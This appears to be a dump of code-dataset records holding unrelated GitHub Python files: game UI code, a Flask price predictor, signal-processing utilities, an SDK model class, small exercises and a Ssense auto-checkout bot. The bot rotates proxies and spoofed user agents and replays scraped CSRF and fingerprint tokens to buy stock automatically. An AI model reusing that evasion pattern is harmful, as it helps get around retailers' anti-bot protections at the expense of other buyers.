(monsterbox[monsterbox_cursor] + \"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n elif len(dungeonmap) < 16:\n for x in range(4):\n if len(player.current_room.monsters) > 0:\n formated_output = (monsterbox[monsterbox_cursor]+\"║\" + \" \" * 60 + \"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n else:\n formated_output = (\"║\" + \" \" * 60 + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns + 22), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns - 22))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = (monsterbox[monsterbox_cursor]+\"║\"+row.center(60)+\"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n\n elif len(dungeonmap) > 16:\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = (monsterbox[monsterbox_cursor]+\"║\"+row.center(60)+\"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n if len(dungeonmap) < 13:\n for x in range(6):\n formated_output = (\"║\" + \" \" * 60 + \"║\")\n print(formated_output.center(os.get_terminal_size().columns))\n elif len(dungeonmap) < 16:\n for x in range(5):\n formated_output = (\"║\" + \" \" * 60 + \"║\")\n print(formated_output.center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\"╚════════════════════════════════════════════════════════════╝\".center(os.get_terminal_size().columns))\n print(\" ╔════════════════════════════════════════════════════════════════════════════╗ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n menu = []\n\n if isinstance(input_menu, str) or not hasattr(input_menu, \"__iter__\"):\n menu.append(input_menu)\n else:\n menu = input_menu.copy()\n\n if kwargs:\n if isinstance(args[0], str) or not hasattr(args[0], \"__iter__\"):\n to_list = list()\n to_list.append(args[0])\n else:\n to_list = args[0]\n menu += to_list\n\n for row in menu:\n row = (\"║\"+row.center(76)+\"║\")\n print(row.center(os.get_terminal_size().columns))\n for i in range(5-len(menu)):\n extralines = (\"║\" + \" \" * 76 + \"║\")\n print(extralines.center(os.get_terminal_size().columns))\n print(\" ╚════════════════════════════════════════════════════════════════════════════╝ \".center(os.get_terminal_size().columns))\n\n def print_hp_score_list(self, player):\n losthp = player.max_hp - int(player.hp)\n hpbar = \"{red}\".format(red=self.colors.get(\"red\"))+(\"▒\"*int(losthp))+\"{green}\".format(green=self.colors.get(\"green\"))+(\"▓\"*int(player.hp))\n hp_score_list = (\" ╔══════════════════╗\",\n \" ║ NAME: ║\",\n \" ║\"+player.name.center(18)+\"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ HP: ║\",\n \" ║\"+hpbar.center(28)+\"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ CLASS: ║\",\n \" ║\"+player.hero_class.center(18) + \"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ SCORE: ║\",\n \" ║\"+str(player.score).center(18)+\"║\",\n \" ╚══════════════════╝\"\n )\n return hp_score_list\n\n def print_monster_hp(self, player):\n if len(player.current_room.monsters) > 0:\n monster_hp = player.current_room.monsters[0].hp\n monster_max_hp = player.current_room.monsters[0].max_hp\n losthp = int(monster_max_hp) - int(monster_hp)\n hpbar = \"{red}\".format(red=self.colors.get(\"red\"))+(\"▒\" * int(losthp))+\"{green}\".format(green=self.colors.get(\"green\")) + (\"▓\" * int(monster_hp))\n hp_score_list = (\" ╔══════════════════╗ \",\n \" ║ MONSTER: ║ \",\n \" ║\" + player.current_room.monsters[0].unit_type.center(18) + \"║ \",\n \" ╚══════════════════╝ \",\n \" ╔══════════════════╗ \",\n \" ║ MONSTER HP: ║ \",\n \" ║\" + hpbar.center(28) + \"║ \",\n \" ╚══════════════════╝ \"\n )\n else:\n hp_score_list = ()\n return hp_score_list\n\n\n def center_text(self, text):\n print(text.center(os.get_terminal_size().columns))\n\n def handle_input(self):\n return input(\"Choice: \".rjust(os.get_terminal_size().columns//2))\n","repo_name":"sonsofbjorn/dungeonrun","sub_path":"game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":24115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72519966245","text":"import numpy as np\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open(r'LGBMmodel.pkl','rb'))\r\n@app.route('/')\r\ndef home():\r\n return render_template('new_ebay.html')\r\n@app.route('/predict',methods=['POST','GET'])\r\ndef predict():\r\n try:\r\n Bid = float(request.form['Bid'])\r\n Bidtime = float(request.form['Bidtime'])\r\n Bidderrate = int(request.form['Bidderrate'])\r\n OpenBid = float(request.form['OpenBid'])\r\n prediction = np.expm1(model.predict([[Bid, Bidtime, Bidderrate, OpenBid]]))\r\n output = round(prediction[0], 2)\r\n if output < 0:\r\n return render_template('new_ebay.html', prediction_texts=\"Cannot sell your Unit\")\r\n else:\r\n return render_template('new_ebay.html', prediction_text='Auction Price for your product will be ₹{}'.format(output))\r\n except ValueError:\r\n return render_template('new_ebay.html', prediction_text=\"Enter your data in numbers only\")\r\n #return(\"Enter integer values only\")\r\n\r\n #return render_template('new 2.html', prediction_text='Auction Price for your product will be ₹{}'.format(output))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n\r\n\r\n\r\n","repo_name":"sreeram1997/EBAY-ONLINE-AUCTION","sub_path":"ebay_auction1.py","file_name":"ebay_auction1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11352021870","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nloss_global_train = []\nloss_global_valid = []\nacc_global_train = []\nacc_global_valid = []\n\n\ndef running_mean_gpu(x, N):\n out = torch.zeros_like(x)\n dim_len = x.size()[1]\n for i in range(0,dim_len):\n if N%2 == 0:\n a, b = i - (N-1)//2, i + (N-1)//2 + 2\n else:\n a, b = i - (N-1)//2, i + (N-1)//2 + 1\n\n #cap indices to min and max indices\n a = max(0, a)\n b = min(dim_len, b)\n out[:,i] = torch.mean(x[:,a:b],axis=1)\n return out\n\n\ndef gpu_CHROM(X):\n Xcomp = 3*X[:,0,:]- 2*X[:,1,:]\n Ycomp = (1.5*X[:,0,:])+X[:,1,:]-(1.5*X[:,2,:])\n sX = torch.std(Xcomp,axis=-1)\n sY = torch.std(Ycomp,axis=-1)\n alpha = (sX/sY)\n alpha = torch.stack([alpha]*64,dim=1)\n bvp = Xcomp-alpha*Ycomp\n #bvp = butter_bandpass(bvp,0.7,3,30,order=3)\n minimo = torch.min(bvp,dim=1)[0]\n massimo = torch.max(bvp,dim=1)[0]\n minimo = torch.stack([minimo]*64,dim=1)\n massimo = torch.stack([massimo]*64,dim=1)\n bvp = (bvp - minimo)/(massimo-minimo)\n bvp = running_mean_gpu(bvp,5)\n return bvp\n\n\ndef raw_rppg(masked):\n num = torch.sum(masked,(3,4))\n denom = torch.count_nonzero(masked,(3,4))\n result = num/denom\n return result\n\n","repo_name":"marukosan93/De-id_rPPG","sub_path":"utils/utils_chrom.py","file_name":"utils_chrom.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43679903868","text":"from bs4 import BeautifulSoup as bs\nimport requests\nfrom fake_useragent import UserAgent\nfrom proxymanager import ProxyManager\nfrom pathlib import Path\nimport os\nimport json\nimport random\nimport datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom subprocess import Popen, PIPE\n\nme = \"xxxxxxxxxxxxx@email.com\"\nyou = \"xxxxxxxx@email.com\"\n\nhome = str(Path.home())\ndirpath = os.getcwd()\n\nprint(datetime.datetime.now())\n\n\nua = UserAgent()\nproxy_manager = ProxyManager('{}/proxies.txt'.format(home))\nrandom_proxy = proxy_manager.random_proxy()\nproxies = random_proxy.get_dict()\nprint(proxies)\n\nsession = requests.Session()\nsession.headers = {'User-Agent': ua.random}\n\nproduct_link_list = ['https://www.ssense.com/en-us/men/product/nike/white-off-white-edition-air-presto-sneakers/3625319', 'https://www.ssense.com/en-us/men/product/nike/black-off-white-edition-air-presto-sneakers/3456739', 'https://www.ssense.com/en-us/men/product/yeezy/grey-boost-700-sneakers/3676879', 'https://www.ssense.com/en-us/women/product/yeezy/grey-boost-700-sneakers/3677059', 'https://www.ssense.com/en-us/men/product/y-3/black-futurecraft-runner-4d-ii-sneakers/3131628', 'https://www.ssense.com/en-us/men/product/nike/beige-off-white-edition-the-ten-blazer-mid-sneakers/3685649', 'https://www.ssense.com/en-us/men/product/nikelab/black/3685639d', 'https://www.ssense.com/en-us/men/product/nikelab/orange/3685649']\n\n\ndef get_sizes_in_stock(product_link):\n\tglobal session, proxies\n\tsizes_in_stock = {}\n\tproduct_response = session.get(product_link, proxies=proxies)\n#\twith open('{}/product_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n#\t\tf.write(product_response.text)\n\tsoup = bs(product_response.text, \"html.parser\")\n\toptions = soup.findAll(\"option\")\t\n\tfor option in options:\n\t\tif (\"Sold Out\" not in option.text) and (\"SELECT A SIZE\" not in option.text):\n\t\t\tprint(option['value'])\n\t\t\toption_value = option['value'].split('_')\n\t\t\tsizes_in_stock[option_value[0]] = option_value[1]\n\treturn sizes_in_stock\n\ndef login():\n\tglobal session, proxies\n\n\tlogin_link = 'https://www.ssense.com/en-us/account/login'\n\n\tlogin_load = {\n\t\t\"email\": \"xxxxxxxxx@email.com\",\n\t\t\"password\": \"XXXXXXX\"\n\t}\n\n\tlogin_response = session.post(login_link, data=login_load, proxies=proxies)\n\tprint(login_response.status_code)\n\tprint(login_response.text)\n\ndef empty_shopping_bag():\n\tglobal session, proxies\n\tshopping_bag_link = 'https://www.ssense.com/en-us/shopping-bag.json'\n\tbag_response = session.get(shopping_bag_link, proxies=proxies)\n\tbag_json = json.loads(bag_response.text)\n\tif bag_json[\"cart\"][\"products\"]:\n\t\tfor product in bag_json[\"cart\"][\"products\"]:\n\t\t\tprint(product[\"sku\"])\n\t\t\tsession.delete(\"https://www.ssense.com/en-us/api/shopping-bag/{}\".format(product[\"sku\"]), proxies=proxies)\n\n\n\n\ndef add_to_cart(sizes_in_stock):\n\tglobal session, proxies\n\tsize_chosen = random.choice(list(sizes_in_stock.values()))\n\tprint(size_chosen)\n\n\tcart_load = {\n\t\t\"serviceType\": \"product-details\",\n\t\t\"sku\": size_chosen,\n\t\t\"userId\": \"\"\n\t}\n\n\tcart_link = \"https://www.ssense.com/en-us/api/shopping-bag/\" + size_chosen\n\n\tcart_response = session.post(cart_link, data=cart_load, proxies=proxies)\n\tprint(cart_response.status_code)\n\t#print(cart_response.text)\n\t#with open('{}/cart_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t#\tf.write(cart_response.text)\n\n\n\ndef checkout():\n\tglobal session, proxies\n\n\tcheckout_link = 'https://www.ssense.com/en-us/checkout'\n\n\tform_response = session.get(checkout_link, proxies=proxies)\n\n\twith open('{}/checkout_form_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t\tf.write(form_response.text)\n\t\n\tform_soup = bs(form_response.text, 'html.parser')\n\n\tCSRTokenId_soup = form_soup.findAll(\"input\", {\"name\": \"CSRFTokenId\"})\n\n\n\t#print(CSRTokenId_soup)\n\tprint(CSRTokenId_soup[0]['value'])\n\tprint(CSRTokenId_soup[0].input['value'])\n\t\n\tdevice_fingerprint_soup = form_soup.findAll(\"input\", {\"name\": \"device_fingerprint\"})\n\tprint(\"Device fignerprint: {}\".format(device_fingerprint_soup[0]['value']))\n\t\n\n\tpayload = {\n\t\t\"CSRFTokenId\": CSRTokenId_soup[0]['value'],\n\t\t\"CSRFTokenValue\": CSRTokenId_soup[0].input['value'],\n\t\t\"shipping_id\": \"\", \n\t\t\"shipping_isnew\": \"1\",\n\t\t\"device_fingerprint\": device_fingerprint_soup[0]['value'],\n\t\t#\"device_fingerprint\": \"2a376561a232f9a8013033653c2099bf\",\n\t\t\"shipping_firstname\": \"xxxxxxx\",\n\t\t\"shipping_lastname\": \"xxxx\",\n\t\t\"shipping_company\": \"\",\n\t\t\"shipping_address\": \"xxxxxxxx\",\n\t\t\"shipping_country\": \"xx\",\n\t\t\"shipping_state\": \"xx\",\n\t\t\"shipping_postalcode\": \"xxxxx\",\n\t\t\"shipping_city\": \"xxxxx\",\n\t\t\"shipping_phone\": \"xxxxxx\",\n\t\t\"shipping_method\": \"43\",\n\t\t\"pccc\": \"\",\n\t\t\"paymentMethod\": \"creditcard\",\n\t\t\"creditcardHolderName\": \"xxxxxx\",\n\t\t\"creditcardNumber\": \"xxxxxxxxxxxxxxxxxxxx\",\n\t\t\"creditcardCVV\": \"xxx\",\n\t\t\"creditCardMonth\": \"xx\",\n\t\t\"creditCardYear\": \"xxxx\",\n\t\t\"sameAsShipping\": \"1\",\n\t\t\"billing_id\": \"\", \n\t\t\"billing_isnew\": \"0\",\n\t\t\"billing_firstname\": \"\",\n\t\t\"billing_lastname\": \"\",\n\t\t\"billing_company\": \"\",\n\t\t\"billing_address\": \"\", \n\t\t\"billing_postalcode\": \"\",\n\t\t\"billing_city\": \"\",\n\t\t\"billing_phone\": \"\"\n\t}\n\n\tcheckout_response = session.post(checkout_link, data=payload, proxies=proxies)\n\n\twith open('{}/checkout_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t\tf.write(checkout_response.text)\n\nsizes_notification = []\n\nfor product_link in product_link_list:\n\tprint(product_link)\n\tsizes_in_stock = get_sizes_in_stock(product_link)\t\n\tprint(sizes_in_stock)\n\tif sizes_in_stock:\n\t\tlogin()\n\t\tempty_shopping_bag()\n\t\tadd_to_cart(sizes_in_stock)\n\t\tcheckout()\n\t\tavailable_sizes = ' '.join(list(sizes_in_stock.keys()))\n\t\tprint(available_sizes)\n\t\tsizes_notification.append(product_link + \"/n\" + available_sizes + \"\\n\")\n\t\tsizes_notification.append(\"------------------------------------\")\n\n\nif sizes_notification:\n\tmsg = MIMEText('\\n'.join(sizes_notification))\n# Create message container - the correct MIME type is multipart/alternative.\n\tmsg['Subject'] = \"Ssense Auto Checkout caught something for you!\"\n\tmsg['From'] = me\n\tmsg['To'] = you\n\tp = Popen([\"/usr/sbin/sendmail\", \"-t\", \"-oi\"], stdin=PIPE, universal_newlines=True)\n\tp.communicate(msg.as_string())\n\nprint(datetime.datetime.now())\n","repo_name":"oe0507llz/ssense-atc-bot","sub_path":"ssense_requests_autocheckout.py","file_name":"ssense_requests_autocheckout.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"2292793107","text":"import sys\nimport pyttsx\n\nengine = pyttsx.init()\n\ndef show(*objs):\n\tbegin = '' if '\\r' in objs[0] or '\\b' in objs[0] else '\\n'\n\tsys.stdout.write(begin)\n\tfor part in objs:\n\t\tsys.stdout.write(str(part))\n\tsys.stdout.flush()\n\ndef say(speech):\n\t#NOT engine.startLoop()\n\tshow(speech)\n\tengine.say(speech)\n\tengine.runAndWait()\n\nprogress = ['/','-','\\\\','|']\ndef show_progress(i):\n\tshow('\\b \\b', progress[i % len(progress)])\n\n","repo_name":"rolote/solar_radiation_model","sub_path":"imagedownloader/libs/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6232456908","text":"#!/usr/bin/env python\n\nimport string, subprocess, sys, time\nfrom Crypto.Cipher import ARC4\nfrom lib import MyARC4\n\nkey = string.ascii_lowercase\nsizes = [6, 60, 600, 2000, 4000, 6000]\nciphers = [ARC4, MyARC4]\ntimes = {}\nsample_filepath = 'samples/plain_{0}k.txt'\nplt_filepath = 'times.plt'\ndat_filepath = 'times.dat'\n\ndef measure():\n for size in sizes:\n times[size] = {}\n for cipher in ciphers:\n plaintext_file = open(sample_filepath.format(size), 'r')\n start = time.clock()\n cipher.new(key).encrypt(plaintext_file.read())\n times[size][cipher] = time.clock() - start\n plaintext_file.close()\n\ndef write():\n plt_file = open(plt_filepath, 'w')\n plt_file.write('set key left top\\n')\n plt_file.write('set grid\\n')\n plt_file.write('set xrange [0:6500]\\n')\n plt_file.write('plot\\\\\\n')\n for cipher in ciphers:\n plt_file.write(' \"{0}\" using 1:{2} title \"{1}\" with points'.format(dat_filepath, cipher.__name__, ciphers.index(cipher)+2))\n if cipher != ciphers[-1]:\n plt_file.write(',\\\\\\n')\n else:\n plt_file.write('\\n')\n plt_file.write('pause -1\\n')\n plt_file.close()\n\n dat_file = open(dat_filepath, 'w')\n for size in sizes:\n dat_file.write('{0:4d} {1:8f} {2:8f}\\n'.format(size, times[size][ARC4], times[size][MyARC4]))\n dat_file.close()\n\ndef draw():\n subprocess.call(['gnuplot', plt_filepath])\n\nmeasure()\nwrite()\ndraw()\n","repo_name":"student-tomasz/odas-laboratorium-4","sub_path":"times.py","file_name":"times.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35006243656","text":"import matplotlib.pyplot as plt\nimport pickle\n\nfrom prg_get import fromLine\nfrom prg_get import prg_get\n\nt_stplst, epilst, stplst, rewlst, count = fromLine()\n\ndone = False\navgs = []\nspacing = 100\nplt_lst = rewlst\nwhile not done:\n total = 0\n n = 0\n for i in range(spacing):\n try:\n total += plt_lst.pop(0)\n n += 1\n except:\n done = True\n if n > 0:\n avgs.append(total/n)\n\nplt.plot(avgs)\n# plt.axis([0,50,100,180])\n# plt.xticks([0,5,10,15,20])\nplt.show()\n","repo_name":"hadrien-pouget/Deep-Q-Learning","sub_path":"src/data/utils/plot_prg.py","file_name":"plot_prg.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31587275089","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ExternalListenerEndpoint(object):\n \"\"\"\n The protocol address that an external listener is configured to listen on.\n \"\"\"\n\n #: A constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"IPC\"\n PROTOCOL_IPC = \"IPC\"\n\n #: A constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"TCP\"\n PROTOCOL_TCP = \"TCP\"\n\n #: A constant which can be used with the protocol property of a ExternalListenerEndpoint.\n #: This constant has a value of \"TCPS\"\n PROTOCOL_TCPS = \"TCPS\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ExternalListenerEndpoint object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.database_management.models.ExternalListenerTcpEndpoint`\n * :class:`~oci.database_management.models.ExternalListenerTcpsEndpoint`\n * :class:`~oci.database_management.models.ExternalListenerIpcEndpoint`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param protocol:\n The value to assign to the protocol property of this ExternalListenerEndpoint.\n Allowed values for this property are: \"IPC\", \"TCP\", \"TCPS\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type protocol: str\n\n :param services:\n The value to assign to the services property of this ExternalListenerEndpoint.\n :type services: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'protocol': 'str',\n 'services': 'list[str]'\n }\n\n self.attribute_map = {\n 'protocol': 'protocol',\n 'services': 'services'\n }\n\n self._protocol = None\n self._services = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['protocol']\n\n if type == 'TCP':\n return 'ExternalListenerTcpEndpoint'\n\n if type == 'TCPS':\n return 'ExternalListenerTcpsEndpoint'\n\n if type == 'IPC':\n return 'ExternalListenerIpcEndpoint'\n else:\n return 'ExternalListenerEndpoint'\n\n @property\n def protocol(self):\n \"\"\"\n **[Required]** Gets the protocol of this ExternalListenerEndpoint.\n The listener protocol.\n\n Allowed values for this property are: \"IPC\", \"TCP\", \"TCPS\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The protocol of this ExternalListenerEndpoint.\n :rtype: str\n \"\"\"\n return self._protocol\n\n @protocol.setter\n def protocol(self, protocol):\n \"\"\"\n Sets the protocol of this ExternalListenerEndpoint.\n The listener protocol.\n\n\n :param protocol: The protocol of this ExternalListenerEndpoint.\n :type: str\n \"\"\"\n allowed_values = [\"IPC\", \"TCP\", \"TCPS\"]\n if not value_allowed_none_or_none_sentinel(protocol, allowed_values):\n protocol = 'UNKNOWN_ENUM_VALUE'\n self._protocol = protocol\n\n @property\n def services(self):\n \"\"\"\n Gets the services of this ExternalListenerEndpoint.\n The list of services registered with the listener.\n\n\n :return: The services of this ExternalListenerEndpoint.\n :rtype: list[str]\n \"\"\"\n return self._services\n\n @services.setter\n def services(self, services):\n \"\"\"\n Sets the services of this ExternalListenerEndpoint.\n The list of services registered with the listener.\n\n\n :param services: The services of this ExternalListenerEndpoint.\n :type: list[str]\n \"\"\"\n self._services = services\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/database_management/models/external_listener_endpoint.py","file_name":"external_listener_endpoint.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"40406453714","text":"def selection_sort(string):\n array = list(string.lower())\n n = len(array)\n for i in range(n):\n min_element_index = i\n for j in range(i+1, n):\n if array[j] < array[min_element_index]:\n min_element_index = j\n array[i], array[min_element_index] = array[min_element_index], array[i]\n return ''.join(array)\n\n\ndef is_anagram(first_string, second_string):\n if not first_string and not second_string:\n return (\"\", \"\", False)\n\n sorted_first = selection_sort(first_string)\n sorted_second = selection_sort(second_string)\n\n boolean = sorted_first == sorted_second\n\n return (\n sorted_first,\n sorted_second,\n boolean\n )\n","repo_name":"DenisDaros/Algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13982505709","text":"from typing import Generator\nfrom uuid import NAMESPACE_DNS, UUID, uuid3, uuid4\n\n\nclass User:\n def __init__(self, id_: UUID, name: str) -> None:\n self.id_: UUID = id_\n self.name: str = name\n\n def __str__(self) -> str:\n return f\"uuid4:\\n{self.id_}, {self.name}\"\n\n\njohn = User(id_=uuid4(), name=\"John\")\nmary = User(id_=uuid4(), name=\"Mary\")\n\nprint(john)\nprint(mary)\n\n\n# _____________________________________________________________________________________________________________________\n\n\ndef get_id(value: str) -> UUID:\n return uuid3(NAMESPACE_DNS, value)\n\n\nclass User1:\n def __init__(self, username: str) -> None:\n self.id_: UUID = get_id(username)\n self.username: str = username\n\n def __str__(self) -> str:\n return f\"uuid3:\\n{self.id_}, {self.username}\"\n\n\njohn1 = User1(username=\"John\")\nmary1 = User1(username=\"Mary\")\nanother_john = User1(username=\"John\")\n\nprint(john1)\nprint(mary1)\nprint(another_john)\n\n\n# _____________________________________________________________________________________________________________________\n\n\ndef create_random_uuid() -> Generator:\n data = set()\n while True:\n new_value: UUID = uuid4()\n if new_value in data:\n continue\n else:\n data.add(new_value)\n yield new_value\n\n\nrandom_uuid: Generator = create_random_uuid()\n\n\nclass User2:\n def __init__(self, username: str) -> None:\n self.id_: UUID = next(random_uuid)\n self.username: str = username\n\n def __str__(self) -> str:\n return f\"uuid4 generator:\\n{self.id_}, {self.username}\"\n\n\njohn2 = User2(username=\"John\")\nmary2 = User2(username=\"Mary\")\nanother_john2 = User2(username=\"John\")\n\nprint(john2)\nprint(mary2)\nprint(another_john2)\n","repo_name":"OlegKhripliviy/hillel_17_10","sub_path":"lesson_04/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7811274491","text":"# coding=utf-8\n\nimport pygame\nimport grille_classe\nimport unite_classe\nimport joueur_classe\nimport ig_menu_classe\nimport regles_classe\nimport fin_jeu\nimport os\nimport HUD\nimport IA\n\nclass Game:\n\tdef __init__(self):\n\t\tself.paused=False\n\n\t\t# Set the width and height of the screen [width, height]\n\t\tself.screen_width = 1410\n\t\tself.screen_height = 910\n\t\tos.environ['SDL_VIDEO_CENTERED'] = '1'\n\n\tdef launch(self,diff):\n\t\tprint('Launching game ...')\n\n\t\tself.screen = pygame.display.set_mode([self.screen_width, self.screen_height])\n\t\tpygame.display.set_caption(\"Road to Mordor\")\n\t\tself.clock = pygame.time.Clock()\n\n\t\tself.joueur = joueur_classe.Joueur(\"Player 1\",\"humain\",1)\n\t\tself.joueurIA = joueur_classe.Joueur(\"Computer\",\"orc\",0)\n\t\tself.hud = HUD.UserInterface(self.screen,self.joueur,self.joueurIA)\n\t\tself.grille = grille_classe.Grille(16,20,diff,self.screen.subsurface((205,50,1000,800)),self.hud,self.joueurIA,self.joueur)\n\t\tself.IA = IA.IA(self.grille,self.joueurIA)\n\t\tself.ig_menu = ig_menu_classe.InGameMenu(self.screen)\n\t\tself.rules = regles_classe.Regles(self.screen)\n\t\tself.game_over = fin_jeu.Fin(self.screen)\n\n\t\tpygame.mixer.music.load('Musique/Musiquedefond.mp3')\n\t\tpygame.mixer.music.play(-1)\n\n\t\tturn=0\n\t\tdone = False\n\t\tshow_regles = False\n\t\tshow_gameOver=False\n\t\t# -------- Main Program Loop -----------\n\t\tkeys_pressed = dict()\n\t\tpygame.event.Event(pygame.USEREVENT,{'key':0,'unicode':''})\n\t\twhile not done:\n\t\t\tturn+=1\n \t# --- Main event loop\n\t\t\tfor event in pygame.event.get():\n #print('EVENT ', pygame.event.event_name(event.type))\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tprint('Ending game ... and QUIT !')\n\t\t\t\t\treturn False\n\t\t\t\telif event.type == pygame.KEYDOWN:\n #keys_pressed[event.key] = {'key': event.key, 'unicode': event.unicode} # Create KEYPRESS events\n\t\t\t\t\tif len(keys_pressed)>0:\n\t\t\t\t\t\tpygame.time.set_timer(pygame.USEREVENT,150)\n\t\t\t\t\tif 